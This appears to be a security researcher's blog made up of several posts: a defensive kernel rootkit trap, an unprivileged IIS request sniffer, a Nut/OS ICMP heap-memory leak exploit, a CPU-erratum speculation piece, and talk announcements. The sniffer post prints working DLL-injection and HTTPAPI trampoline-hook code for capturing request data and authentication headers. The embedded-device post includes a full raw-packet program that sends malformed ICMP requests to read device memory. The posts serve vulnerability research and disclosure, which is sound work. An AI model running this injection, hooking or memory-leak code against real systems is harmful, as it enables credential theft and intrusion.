ThotCon 0x01

For those who haven’t heard, Greg Ose and I will be presenting at the first annual ThotCon on April 23 in Chicago. If you haven’t gotten your ticket yet you will need to hurry, as they are almost gone. Our talk is called “Forensic Fail: Malware Kombat” and will cover some of the failings of digital forensics. We also have a surprise lined up for the end, so if you are in the area you won’t want to miss it.

You can register for the conference at http://www.thotcon.org/registration.html. We hope to see you there.

Hacker Halted 2009

As many of you know, Greg Ose and I recently spoke at Hacker Halted 2009 in Miami. We discussed a distributed password cracker we designed and implemented that uses redirected browsers to build a swarm of worker nodes. The method we demonstrated can be implemented using large numbers of otherwise useless stored cross-site scripting vulnerabilities. The client-side worker was implemented as a Java applet in an injected iframe.

Greg and I also showed several methods which can be used on different platforms to trick the Java virtual machine into continuing execution after a client has closed the page where the applet is embedded. This can be used to maintain large numbers of workers even when the vulnerable sites are not visited for long periods of time.

The following video shows the administrative interface to DistCrypt where we can add and manage password hashes.

You can view the high quality version here.

You can also view the slides from our presentation on the Hacker Halted website here.

What do Rootkits and Xerxes have in common?

By: Cris Neckar and Greg Ose

Just think of your kernel as Greece…

It’s probably not the first thing you expected to hear me say, but bear with me. The arms race between rootkit development and detection has been raging for years, and although there have been great advancements in detection, rootkit developers have always had the upper hand. You simply cannot defend against what you cannot predict. Recently the battle has become increasingly heated as rootkit developers dig deeper and deeper. One need only look at the Blackhat Briefings for the past few years to see the trend.

Increasingly subversive and complex rootkits threaten to overrun our kernels and turn our business-critical systems into slaves. So what are we to do? Should we simply throw up our hands and resign ourselves to a life of bondage?

To answer this question, let’s approach the problem from a different angle. It has become clear that we cannot simply monitor everything a rootkit developer might change. There are just too many function pointers, operating modes, and devices to allow us to watch them all. However, one commonality does exist in all kernel mode rootkits: in some way, they must all be inserted into the kernel.

There are a number of ways to introduce new code into a running kernel, but not nearly so many as there are places to hide once inside. I propose that, instead of building a blacklist and peeking under all the rocks where rootkits have hidden in the past, we monitor the entry point. Leonidas used a similar approach when Xerxes threatened Greece: instead of fighting on even ground, the Spartans guarded the narrow pass through which the Persians had to travel to enter Greece.

So, you say, it’s a great theory, but how do we implement it? Assuming an attacker has compromised a system’s most privileged usermode context, for instance a process running as root, code can be introduced into the running kernel in a number of ways. The most obvious of these is to install a module or driver and be done with it. Aside from that, an attacker would need to patch kernel memory directly; this is not trivial but is still a common method of rootkit insertion. Beyond these options, the attacker would be forced to edit the kernel binary, or an existing module on disk, and either cause or wait for a reboot (there is one additional threat which we will save for later). The interesting thing about all of these potential insertion points is that they are events which would almost never occur on a production server (and if they do occur, an administrator will certainly be aware of the reason). By monitoring these few events we would be notified of the insertion of any existing kernel mode rootkit that I am aware of, as well as any that could be written in the future (barring a further vulnerability... more on this later).

Implementing this on Linux is actually fairly trivial. To catch code inserted into a running kernel we can use the tricks of rootkit developers ourselves: namely, we can hook sys_init_module() (for module insertions) and the write() handlers within the kmem and mem file_operations structures (for writes to /dev/(k)mem, where these are still possible).
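As a rough sketch of that first trap (our own illustration, assuming a 2.6-era x86-64 kernel): sys_call_table is not exported, so its address is passed in here as a module parameter (taken from System.map or found by scanning), and on kernels that map the table read-only the page protection would also have to be cleared before patching.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/sched.h>
#include <linux/unistd.h>

/* Address of sys_call_table, supplied at insmod time (e.g. from System.map). */
static unsigned long table_addr;
module_param(table_addr, ulong, 0);

static void **sys_call_table;

typedef long (*init_module_fn)(void __user *, unsigned long, const char __user *);
static init_module_fn orig_init_module;

static long hooked_init_module(void __user *umod, unsigned long len,
                               const char __user *uargs)
{
        /* Log before the module is linked into the kernel. In the full scheme
         * this is where the syslog-over-the-wire notification (discussed
         * below) would be generated. */
        printk(KERN_ALERT "trap: init_module called by pid %d\n", current->pid);

        return orig_init_module(umod, len, uargs);
}

static int __init trap_init(void)
{
        if (!table_addr)
                return -EINVAL;
        sys_call_table = (void **)table_addr;
        orig_init_module = (init_module_fn)sys_call_table[__NR_init_module];
        sys_call_table[__NR_init_module] = (void *)hooked_init_module;
        return 0;
}

static void __exit trap_exit(void)
{
        sys_call_table[__NR_init_module] = (void *)orig_init_module;
}

module_init(trap_init);
module_exit(trap_exit);
MODULE_LICENSE("GPL");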

The next step is to defend against changes made to kernel components on disk. For the kernel image itself, on a system which is rarely rebooted, such as a production server, it is possible to accomplish this by booting a known-good kernel. For example, a kernel could be booted from media which is only physically attached to the system when the kernel is initially loaded into memory. A similar approach could be used with required kernel modules, or, if preferable, they could be compared on load against known-good checksums.

Now that we have covered the entry points we can focus on what to do once one of these events occurs. We do not actually need to prevent the insertion as, in some cases, these events may legitimately occur (once a root compromise has occurred, a re-image of the system is generally the best approach anyway). Instead we simply need to securely log the event to a location which is not controlled by the intruder. Obviously we cannot log locally. Additionally, we cannot log with mechanisms which are already under the attacker’s control (anything accessible from user mode is out). One relatively trivial solution is to simply create a syslog packet and drop it on the network stack when one of our traps triggers. This will provide us with a remote log on a system which (hopefully) has not been compromised. When implementing this you would of course want to be careful to temporarily disable any netfilter hooks (think iptables), as these could allow the intruder to block our logging packet from usermode.
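For reference, here is a hedged sketch of that logging path using the 2.6-era in-kernel socket API; notify_remote(), SYSLOG_SERVER, and SYSLOG_PORT are our own placeholder names, the destination address is a stand-in, and a complete implementation would also walk and temporarily disable registered netfilter hooks before sending.

#include <linux/kernel.h>
#include <linux/in.h>
#include <linux/net.h>
#include <linux/socket.h>
#include <linux/string.h>
#include <linux/uio.h>
#include <net/sock.h>

#define SYSLOG_SERVER 0x0a000001  /* 10.0.0.1, placeholder log host */
#define SYSLOG_PORT   514

static void notify_remote(const char *event)
{
        struct socket *sock;
        struct sockaddr_in addr;
        struct msghdr msg;
        struct kvec vec;
        char buf[256];
        int len;

        /* <12> = facility user, severity warning */
        len = snprintf(buf, sizeof(buf), "<12>kernel-trap: %s", event);

        if (sock_create_kern(PF_INET, SOCK_DGRAM, IPPROTO_UDP, &sock) < 0)
                return;

        memset(&addr, 0, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(SYSLOG_PORT);
        addr.sin_addr.s_addr = htonl(SYSLOG_SERVER);

        memset(&msg, 0, sizeof(msg));
        msg.msg_name = &addr;
        msg.msg_namelen = sizeof(addr);

        vec.iov_base = buf;
        vec.iov_len = len;

        /* Drops the datagram directly on the network stack, below anything
         * reachable from user mode. */
        kernel_sendmsg(sock, &msg, &vec, 1, len);
        sock_release(sock);
}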

Like Sparta’s defense at Thermopylae, this method also has its mountain path. I mentioned earlier that there was an additional method for introducing code into a running kernel. This would involve the existence of a vulnerability within the kernel, or a loaded module, which allows arbitrary memory to be written. An attacker could create an exploit which uses such a vulnerability to introduce a rootkit into the kernel. We cannot possibly predict where an exploit will occur (if we could, vulnerability research would be a lot easier :) ), making it impossible (so far ;) ) to guard against this threat using this method. Fortunately, a rootkit which used this installation method would be obsolete the moment it was first detected. This means that this type of rootkit could never reach widespread usage and would most likely be used only in a very targeted attack.

Unprivileged Sniffing

The standard attack path against a hardened system almost invariably involves escalating privileges locally. Privileged access allows the attacker to do things like access all data on the server, sniff network traffic, and install rootkits or other privileged malware. Typically, one of the goals of host hardening is to limit the damage that an attacker who has gained access to an unprivileged account can do. “Successfully” hardening a web server, for example, involves preventing the account used by the httpd service/server from modifying the source code of the application it hosts.

Imagine a web server that handles sensitive information, let’s say credit card numbers. This application runs through an interpreter invoked by a web server running as an unprivileged user. No matter how this data is encrypted at rest, if it can be decrypted by the application, an attacker with the ability to invoke an arbitrary process at the same privilege level as the application will be able to recover the data. This is not true, however, of data which is stored as a hash or encrypted using an asymmetric public key where the private key is not present. In these cases an attacker is often forced to escalate local privileges to sniff data in transit, either by sniffing the network or by modifying encryption libraries. Even when data is stored in a retrievable format, especially on hardened systems, recovering this obfuscated data can be a daunting task for an attacker. Many applications now employ a multi-tiered approach which requires a significant amount of time and effort to attack and gain access to the critical keys or algorithms.

Given the architecture of Windows servers, however, it is possible, via access to an unprivileged service account such as Network Service (the default IIS application pool identity), to implement a form of unprivileged sniffer which will monitor sensitive information as it is passed through the target application. This can be implemented in a way which would allow an attacker to trivially monitor all data in motion through the application. In the case of a web application this would include any parameters within a request, data returned by the server, or even headers like those used for basic authentication. This method is generic across applications and can be used to sniff encrypted connections.

The unprivileged sniffer doesn’t employ any tactics that are strictly new, and although we haven’t seen this implemented in malware to date it wouldn’t be surprising if something similar has been done. The implementation I will describe is effective against IIS 6, but similar things could be implemented for other applications (SQL Server and Apache come to mind).

The first challenge in hooking into an IIS worker process or Application Pool (w3wp.exe) is knowing when it will start. A request coming into IIS is handled by the W3SVC service and passed off to an Application Pool via a named pipe. The service will either instantiate a new worker process, passing the pipe name as an argument, or assign the connection to an existing worker. The difficulty is that as the unprivileged worker account we cannot hook into W3SVC itself, so we must either constantly watch for new instantiations of ‘w3wp.exe’ or have some way of knowing when they start. By monitoring named pipes using the undocumented API ‘NtQueryDirectoryFile’ we can watch for the creation of pipes whose names start with ‘iisipm’. A pipe will be created each time a new worker is initialized, giving us a head start hooking the new process.
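As a rough sketch of that monitoring (our own illustration, not the original tool), the pipe namespace can be enumerated from user mode by opening \\.\pipe\ as a directory and walking it with NtQueryDirectoryFile; the structure definitions below mirror the DDK layouts since they are not available in the user-mode SDK headers.

#include <windows.h>
#include <stdio.h>
#include <wchar.h>

/* Minimal declarations for the native API pieces we need. */
typedef struct _MY_IO_STATUS_BLOCK {
    ULONG_PTR Status;
    ULONG_PTR Information;
} MY_IO_STATUS_BLOCK;

typedef struct _MY_FILE_DIRECTORY_INFORMATION {
    ULONG NextEntryOffset;
    ULONG FileIndex;
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER EndOfFile;
    LARGE_INTEGER AllocationSize;
    ULONG FileAttributes;
    ULONG FileNameLength;
    WCHAR FileName[1];
} MY_FILE_DIRECTORY_INFORMATION;

#define FileDirectoryInformation 1

typedef LONG (NTAPI *NtQueryDirectoryFileType)(HANDLE, HANDLE, PVOID, PVOID,
    MY_IO_STATUS_BLOCK *, PVOID, ULONG, ULONG, BOOLEAN, PVOID, BOOLEAN);

int main(void)
{
    NtQueryDirectoryFileType NtQueryDirectoryFile_p =
        (NtQueryDirectoryFileType)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                                 "NtQueryDirectoryFile");
    MY_IO_STATUS_BLOCK iosb;
    BYTE buf[8192];
    BOOLEAN restart = TRUE;
    HANDLE pipes;

    if (NtQueryDirectoryFile_p == NULL)
        return 1;

    /* Open the named pipe namespace itself as a directory. */
    pipes = CreateFileW(L"\\\\.\\pipe\\", GENERIC_READ,
                        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                        OPEN_EXISTING, 0, NULL);
    if (pipes == INVALID_HANDLE_VALUE)
        return 1;

    /* A real monitor would run this enumeration in a loop and diff the results
       against the previous pass to catch newly created 'iisipm*' pipes. */
    while (NtQueryDirectoryFile_p(pipes, NULL, NULL, NULL, &iosb, buf, sizeof(buf),
                                  FileDirectoryInformation, FALSE, NULL, restart) == 0) {
        MY_FILE_DIRECTORY_INFORMATION *info = (MY_FILE_DIRECTORY_INFORMATION *)buf;
        restart = FALSE;
        for (;;) {
            if (_wcsnicmp(info->FileName, L"iisipm", 6) == 0)
                wprintf(L"worker pipe: %.*s\n",
                        (int)(info->FileNameLength / sizeof(WCHAR)), info->FileName);
            if (info->NextEntryOffset == 0)
                break;
            info = (MY_FILE_DIRECTORY_INFORMATION *)((BYTE *)info + info->NextEntryOffset);
        }
    }

    CloseHandle(pipes);
    return 0;
}

Once a matching pipe appears, the injection shown below can be fired at the newly created worker.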

Now that we know a process will be created we can do a standard library injection using code similar to the following to identify it and inject our sniffer. In this code LIBNAME represents the name of the DLL to inject.

#include <windows.h>
#include <tlhelp32.h>
#include <string.h>

/* LIBNAME is the path of the DLL to inject (see text). */
static void inject_sniffer(void)
{
    PROCESSENTRY32 entry;
    HANDLE snapshot;
    BOOL r = FALSE;
    DWORD TargetPID = 0;
    HANDLE Proc;
    LPVOID LoadLibAddr, RemoteName;

    /* Find the PID of the "w3wp.exe" process. */
    entry.dwSize = sizeof(PROCESSENTRY32);
    if ((snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) != INVALID_HANDLE_VALUE) {
        for (r = Process32First(snapshot, &entry); r; r = Process32Next(snapshot, &entry)) {
            if (strstr(entry.szExeFile, "w3wp.exe")) {
                TargetPID = entry.th32ProcessID;
            }
        }
        CloseHandle(snapshot);
    }

    if (!TargetPID) return;

    /* Open the process */
    if ((Proc = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, FALSE, TargetPID)) == NULL) return;

    /* Get the address of "LoadLibraryA" to use as our remote thread procedure */
    if ((LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA")) == NULL) goto out;

    /* Allocate a block of memory within "w3wp.exe" to hold the name of the DLL we are injecting and copy it in */
    if ((RemoteName = VirtualAllocEx(Proc, NULL, strlen(LIBNAME) + 1, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)) == NULL) goto out;
    if (!WriteProcessMemory(Proc, RemoteName, LIBNAME, strlen(LIBNAME) + 1, NULL)) goto out;

    /* Create a thread within "w3wp.exe" which will load our DLL into memory */
    CreateRemoteThread(Proc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibAddr, RemoteName, 0, NULL);

out:
    CloseHandle(Proc);
}

We now have our library loaded into the address space of the worker process. When this occurs, the entry point of our library will be called. We will use the concept of a trampoline to hook certain calls within the w3wp process. Specifically, IIS uses a library called HTTPAPI for passing HTTP requests and responses around. By hooking into the following calls we can examine requests and responses passed through this worker.

  • HttpReceiveHttpRequest
  • HttpReceiveRequestEntityBody
  • HttpSendHttpResponse
  • HttpSendResponseEntityBody

As an example the following stub shows one way of hooking ‘HttpReceiveHttpRequest’.

#include <windows.h>
#include <http.h>

/* This will store the address of the HttpReceiveHttpRequest function */
typedef ULONG (*HttpReceiveHttpRequestType)(HANDLE, ULONGLONG, ULONG, PHTTP_REQUEST, ULONG, PULONG, LPOVERLAPPED);
HttpReceiveHttpRequestType HttpReceiveHttpRequestSaved;

/* Forward declaration of our hook procedure (defined below) */
ULONG HttpReceiveHttpRequestHook(HANDLE, ULONGLONG, ULONG, PHTTP_REQUEST, ULONG, PULONG, LPOVERLAPPED);

/* The trampoline structure is used to save both the original 6 bytes of the
   function we are hooking and the new instructions we replace them with.
   It must be byte-packed so that it is exactly 6 bytes long. */
#pragma pack(push, 1)
typedef struct _trampoline {
    char push;
    void *func;
    char ret;
} Tramp, *PTramp;
#pragma pack(pop)

Tramp HRHR, oldHRHR;
HMODULE lib;
SIZE_T i;

/* Ensure that HTTPAPI.dll has been loaded */
lib = LoadLibraryA("HTTPAPI.dll");

/* Save the address of "HttpReceiveHttpRequest" */
HttpReceiveHttpRequestSaved = (HttpReceiveHttpRequestType)GetProcAddress(lib, "HttpReceiveHttpRequest");

/* 0x68 is the x86 PUSH instruction */
HRHR.push = 0x68;

/* We are pushing the address of our hook */
HRHR.func = (void *)&HttpReceiveHttpRequestHook;

/* 0xC3 is the x86 RETN instruction, which will pop the value we just pushed
   and jump to that location. This effectively hijacks the flow of execution */
HRHR.ret = (char)0xC3;

/* We then read the original 6 bytes of the HttpReceiveHttpRequest function */
ReadProcessMemory(GetCurrentProcess(), (void *)HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* And replace them with our trampoline code */
WriteProcessMemory(GetCurrentProcess(), (void *)HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

We have now replaced the first six bytes of the ‘HttpReceiveHttpRequest’ function mapped within the ‘w3wp.exe’ process to redirect the flow of execution into our hook procedure. Within that hook we can sniff any data passed through the function by implementing code similar to the following.

ULONG HttpReceiveHttpRequestHook(HANDLE ReqQueueHandle, ULONGLONG RequestId, ULONG Flags, PHTTP_REQUEST pRequestBuffer, ULONG RequestBufferLength, PULONG pBytesReceived, LPOVERLAPPED pOverlapped) {
    ULONG ret;
    SIZE_T i;
    HANDLE log;  /* destination for the sniffed data; logging is omitted here */

    /* First we replace the first 6 bytes of the real 'HttpReceiveHttpRequest'
       function with their original value */
    WriteProcessMemory(GetCurrentProcess(), (void *)HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

    /* We then call the real function and save the return value */
    ret = HttpReceiveHttpRequestSaved(ReqQueueHandle, RequestId, Flags, pRequestBuffer, RequestBufferLength, pBytesReceived, pOverlapped);

    /* At this point all data within the HTTP_REQUEST stored at pRequestBuffer
       is valid and can be saved to a file or sent out over the network. This
       data includes the request headers and GET parameters passed with the
       request */

    /* After we have performed our sniffing operations we write our trampoline
       back into the real function */
    WriteProcessMemory(GetCurrentProcess(), (void *)HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

    /* And return the saved return value */
    return ret;
}

If similar hooks were implemented for each of the functions listed above, all information in and out of IIS could be sniffed in a way which is generic to the web application being used.
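For instance, a small helper like the following (install_hook() and its parameters are our own invention, not part of the original tooling; it reuses the packed Tramp structure defined in the stub above) could apply the same six-byte trampoline to each of the HTTPAPI exports listed earlier.

#include <windows.h>

/* Hypothetical helper: installs the 6-byte push/ret trampoline over any
   HTTPAPI.dll export. Returns 0 on failure. */
static int install_hook(const char *export_name, void *hook_proc,
                        void **saved_target, Tramp *patch, Tramp *original)
{
    HMODULE lib;
    void *target;
    SIZE_T n;

    if ((lib = LoadLibraryA("HTTPAPI.dll")) == NULL)
        return 0;
    if ((target = (void *)GetProcAddress(lib, export_name)) == NULL)
        return 0;

    *saved_target = target;

    patch->push = 0x68;              /* x86 PUSH imm32 */
    patch->func = hook_proc;         /* address of our hook procedure */
    patch->ret  = (char)0xC3;        /* x86 RETN */

    /* Save the original 6 bytes so the hook can temporarily restore them. */
    if (!ReadProcessMemory(GetCurrentProcess(), target, original, 6, &n))
        return 0;

    /* Overwrite the function prologue with the trampoline. */
    return WriteProcessMemory(GetCurrentProcess(), target, patch, 6, &n) ? 1 : 0;
}

Each of HttpReceiveRequestEntityBody, HttpSendHttpResponse, and HttpSendResponseEntityBody could then be wrapped with its own hook procedure in the same way as HttpReceiveHttpRequest.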

Although this implementation is deliberately incomplete, it demonstrates one use case for an unprivileged sniffer. This type of attack is possible in Windows due to specifics of process creation and how privileges are dropped. It is worth mentioning that a similar attack is generally not possible against comparable services on Linux. In Linux the ability to ptrace a process is controlled by the dumpable flag within the mm member of the process’ task_struct. When privileges are dropped the dumpable flag is unset, and this is inherited when a fork or execve occurs. This prevents the owning user of the resulting process from modifying the process’ execution. Because lower privilege workers in Linux are not newly created processes, but rather inherit this state from the root-owned parent, they are not debuggable by the lower privileged worker account.
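As a quick illustration of that flag (a hedged sketch of our own, assuming the default fs/suid_dumpable setting of 0; it has to be started as root to show the transition):

#include <stdio.h>
#include <sys/prctl.h>
#include <unistd.h>

/* Prints the dumpable flag before and after dropping privileges. When run as
   root, the value drops from 1 to 0 after setuid(), which is what prevents
   the unprivileged owner from attaching to the process with ptrace. */
int main(void)
{
    printf("dumpable before setuid: %d\n", prctl(PR_GET_DUMPABLE, 0, 0, 0, 0));

    if (setuid(65534) != 0) {     /* 65534 is "nobody" on many systems (assumption) */
        perror("setuid");
        return 1;
    }

    printf("dumpable after setuid:  %d\n", prctl(PR_GET_DUMPABLE, 0, 0, 0, 0));
    return 0;
}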

We are not currently aware of a way of preventing this type of attack. The Windows privilege structure, and individual privileges such as SeDebugPrivilege, are not designed to prevent access by a process’s owning user. If a fix is possible it would likely relate to the creation of the worker processes and would require modification of the individual applications. If you have an idea for a fix please let us know.

Exploiting Embedded Devices (Part 1)

Recently we have been assessing an increasing number of embedded devices. Seeing as the methods for carrying out this type of assessment are not at all well defined, I am starting a series of posts discussing vulnerabilities and exploitation on embedded platforms.

In recent years the exploitation of common vulnerability classes on the most popular platforms has become increasingly difficult. Although vulnerabilities are still common, especially in client side applications, exploiting these vulnerabilities often becomes a complex matter of bypassing multiple protection mechanisms including stack cookies, heap verification, and data execution prevention. However, with the move towards miniaturization, products are increasingly giving up these protections and moving to largely untested platforms. Often the base libraries and operating systems chosen for these devices contain trivially exploitable vulnerabilities.

Several months ago I assessed a product which included a networked device based on Nut/OS. This minimal operating system describes itself as follows:

Nut/OS is an intentionally simple RTOS for the ATmega128, which provides a minimum of services to run Nut/Net, the TCP/IP stack. Its features include:
+  Non preemptive multithreading.
+  Events.
+  Periodic and one-shot timers.
+  Dynamic heap memory allocation.
+  Interrupt driven streaming I/O.

Main features of the TCP/IP stack are:
+  Base protocols ARP, IP, ICMP, UDP and TCP.
+  User protocols DHCP, DNS and HTTP.
+  Socket API.
+  Host, net and default routing.
+  Interrupt driven Ethernet driver.

While assessing the device, one of the most exposed components was the network stack, so some discussion of this minimal operating system’s network stack is in order. The vulnerability I will discuss has now been patched, but the vulnerable version of the operating system can be downloaded here. An incoming IP packet is passed from the device driver into NutEtherInput() and on into NutIpInput(), where it is demuxed to determine its protocol and passed to the appropriate component. Within NutIpInput(), on line 187 of net/ipin.c, the length of the IP header is calculated and used without being sanity checked. The IP header length field is a 4-bit value expressed in 32-bit words, which is multiplied by 4 to determine the header length in bytes. Later, on lines 250, 251, and 252, several lengths are calculated based on this value, as well as on the unchecked length field for the entire packet. This vulnerability leads to a number of interesting conditions throughout the network stack where pointers to protocol headers and data are calculated based on incorrect IP header lengths.

void NutIpInput(NUTDEVICE * dev, NETBUF * nb) {
    ...
    ip_hdrlen = ip->ip_hl * 4;
    if (ip_hdrlen < sizeof(IPHDR)) {
        NutNetBufFree(nb);
        return;
    }
    ...
    nb->nb_nw.sz = ip_hdrlen;
    nb->nb_tp.vp = ((char *) ip) + (ip_hdrlen);
    nb->nb_tp.sz = htons(ip->ip_len) - (ip_hdrlen);

The most interesting of these, from the perspective of exploitation, are strangely in one of the simplest protocol handlers: ICMP. This arises largely from the fact that the buffers allocated for incoming echo requests are reused for the responses. The responses are sent through NutIcmpOutput() in net/icmpout.c. To exploit this we need data to be written through a pointer which can be pushed forward into another chunk of heap memory by specifying an incorrect IP header length. Only two writes meet these criteria. The first is the type field of the ICMP packet, which in this case will always be zero (the echo reply type). Although it may be possible to gain execution in some cases with the ability to overwrite heap memory with a null byte, in this case there is a more interesting alternative. The second field which is written is a checksum of the ICMP portion of the packet (data that we control at least parts of). So, by specifying an IP header length which is larger than the true length (typically 5) and controlling the calculated checksum, we can write an arbitrary 2 bytes to any 32-bit boundary within 9 words (the largest IP header length, 15, minus the smallest IP header, 5, minus the size of the ICMP header, 1) of the end of our packet in memory.

int NutIcmpOutput(uint8_t type, uint32_t dest, NETBUF * nb) {
    ICMPHDR *icp;
    uint16_t csum;

    icp = (ICMPHDR *) nb->nb_tp.vp;
    icp->icmp_type = type;
    icp->icmp_cksum = 0;
    csum = NutIpChkSumPartial(0, nb->nb_tp.vp, nb->nb_tp.sz);
    icp->icmp_cksum = NutIpChkSum(csum, nb->nb_ap.vp, nb->nb_ap.sz);
    return NutIpOutput(IPPROTO_ICMP, dest, nb);
}

This leads us to another difficulty: the Nut/OS heap implementation (specifically its use of singly linked lists). I will go into this in more detail in another post, but for now I want to talk about another vector for exploiting this vulnerability. In many cases the rather limited memory of an embedded device contains information that would be useful to an attacker. Things like encryption keys and passwords are stored in the same address space that the network stack is operating on. If you have been following along you may see where I am going with this. When we specify a packet length in the IP header of an ICMP echo request (not ip->ip_hl this time, but ip->ip_len) that is larger than the actual packet sent, a condition results where the excess length for the echo response is pulled from the memory directly after the allocated buffer. By sending an ICMP echo request with no data and a long claimed length we can effectively read chunks of memory from the vulnerable device. To obtain the maximum amount of memory it is possible, by forcing allocations and deallocations using particulars of the TCP stack, to change the location where the packet buffer is allocated.
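To make the read primitive concrete, here is a hedged sketch of what such a probe could look like from the attacker's side. It builds the Ethernet frame by hand (on Linux the IP layer overwrites a raw socket's total-length field, so an AF_PACKET socket is used instead, which requires root); the interface name, MAC, and IP addresses are placeholders, and details such as how the device validates the incoming ICMP checksum are glossed over.

#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netpacket/packet.h>
#include <linux/if_ether.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define IFACE "eth0"   /* placeholder interface */
#define LIE   200      /* bytes of device memory we hope to read back */

static unsigned short cksum(const unsigned short *p, int len)
{
    unsigned long sum = 0;
    while (len > 1) { sum += *p++; len -= 2; }
    if (len) sum += *(const unsigned char *)p;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)~sum;
}

int main(void)
{
    unsigned char dst_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; /* placeholder */
    unsigned char frame[ETH_HLEN + sizeof(struct iphdr) + sizeof(struct icmphdr)];
    struct ethhdr *eth = (struct ethhdr *)frame;
    struct iphdr *ip = (struct iphdr *)(frame + ETH_HLEN);
    struct icmphdr *icmp = (struct icmphdr *)(frame + ETH_HLEN + sizeof(struct iphdr));
    struct sockaddr_ll sll;
    int s;

    memset(frame, 0, sizeof(frame));
    memcpy(eth->h_dest, dst_mac, 6);
    /* eth->h_source is left zeroed here; fill in the real interface MAC */
    eth->h_proto = htons(ETH_P_IP);

    ip->version = 4;
    ip->ihl = 5;
    ip->ttl = 64;
    ip->protocol = IPPROTO_ICMP;
    ip->saddr = inet_addr("192.168.1.10");   /* placeholder source */
    ip->daddr = inet_addr("192.168.1.20");   /* placeholder: the device */
    /* The lie: claim LIE extra bytes of payload that we never send. The echo
       reply will be built from whatever sits after our buffer on the heap. */
    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + LIE);
    ip->check = cksum((unsigned short *)ip, sizeof(struct iphdr));

    icmp->type = ICMP_ECHO;
    icmp->un.echo.id = htons(0x1234);
    icmp->un.echo.sequence = htons(1);
    icmp->checksum = cksum((unsigned short *)icmp, sizeof(struct icmphdr));

    if ((s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 0) {
        perror("socket");
        return 1;
    }

    memset(&sll, 0, sizeof(sll));
    sll.sll_family = AF_PACKET;
    sll.sll_protocol = htons(ETH_P_IP);
    sll.sll_ifindex = if_nametoindex(IFACE);
    sll.sll_halen = ETH_ALEN;
    memcpy(sll.sll_addr, dst_mac, ETH_ALEN);

    /* Only the real (short) frame goes on the wire. */
    if (sendto(s, frame, sizeof(frame), 0, (struct sockaddr *)&sll, sizeof(sll)) < 0)
        perror("sendto");

    close(s);
    return 0;
}

If the lie is accepted, the echo reply that comes back carries roughly LIE bytes of whatever followed the request buffer on the device's heap.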

Visualizing the attack with ninjas

By manipulating the heap it is possible to rebuild large sections of the vulnerable device’s memory from the data segment of the returned ICMP responses. In many cases this will give the attacker everything they need to further compromise the system. Even when no critical encryption key or password that can be leaked exists in memory, this attack is extremely useful in helping to facilitate a more typical heap corruption exploit.

I want to touch briefly on the steps that device manufacturers can take to avoid this type of vulnerability. It is not sufficient to assume that because a device is embedded it will not be attacked. As the popularity of deploying this type of system on the internet continues to grow, greater numbers of attackers will focus on these platforms simply because exploitation is often easier. When deploying internet-enabled devices the same precautions should be taken as with more conventional platforms like Windows and Linux. During the design process, base libraries and operating systems should be vetted through security review prior to inclusion in a product. I expect to see much more research into these platforms as Ethernet adapters and wireless interfaces are added to more and more devices.

Exploiting Erroneous Errata

Recently I was reading through the line-up for the Hack in the Box Conference, which will be held in Malaysia this October. The following talk made my ears perk up: “Remote Code Execution Through Intel CPU Bugs” by Kris Kaspersky. Briefly, this talk will cover the exploitation of Intel processor errata. Yes, you heard that right, Kris has managed to exploit hardware bugs. He goes on to say that they have developed PoC code which allows for remote exploitation of at least one of these bugs.

When I first came across this I was impressed to say the least. I decided to re-read the Intel Errata to see if I could spot the exploitable conditions. There was some discussion when these were first released, including speculation into the exploitability of several of these, but like most people I didn’t think much of it (OS developers flip out all the time).

After reading through the Intel Core 2 documents I decided to check out the revisions for the Athlon 64 as well. That’s where I ran across this gem:

Errata 95: “RET Instruction May Return To Incorrect EIP”

Speaking of exploitability… Let’s see what causes this.

In order to efficiently predict return addresses, the processor implements a 12-deep return address stack to pair RETs with previous CALLs.

Under the following unusual and specific conditions, an overflowed hardware return stack may cause a RET instruction to return to an incorrect EIP in 64-bit systems running 32-bit compatibility mode applications:

• A CALL near is executed in 32-bit compatibility mode.
• Prior to a return from the called procedure, the processor is switched to 64-bit mode.
• In 64-bit mode, subsequent CALLs are nested 12 levels deep or greater.
• The lower 32 bits of the 64-bit return address for the 12th-most deeply nested CALL in 64-bit mode matches exactly the 32-bit return address of the original 32-bit mode CALL.
• A series of RETs is executed from the nested 64-bit procedures.
• The processor returns to 32-bit compatibility mode.
• A RET is executed from the originally called procedure.

So let’s assume you have a 32-bit application running in compatibility mode that you would like to exploit, and that you can force a somewhat long function to be repeatedly called. You could create a 64-bit thread with a very tight function that recursively calls itself 12 times and returns to an address which matches (in its lower 32 bits) the return address of the function you are targeting. This would create a bit of a race, but it would be very winnable given a slightly complex target and a tight exploit loop.

Of course the erratum doesn’t detail what the incorrect return address might be, but assuming it can somehow be predicted or controlled this could be a fun little bug. This specific bug only exists on a small subset of AMD hardware, specifically CPUIDs 0xF51, 0xF58, and 0xF48. If anyone has a processor with the bug and would like to experiment with it I would love to hear from you.

Local File Inclusion – Tricks of the Trade

By: Cris Neckar, Andrew Case

Everyone understands that local file includes are bad. The ability to execute an arbitrary file as code is unquestionably a security risk and should be protected against. However, the process of exploitation can be rather involved and is commonly misunderstood. In this post I want to clarify the risks involved in this type of vulnerability and the complications involved in exploitation.

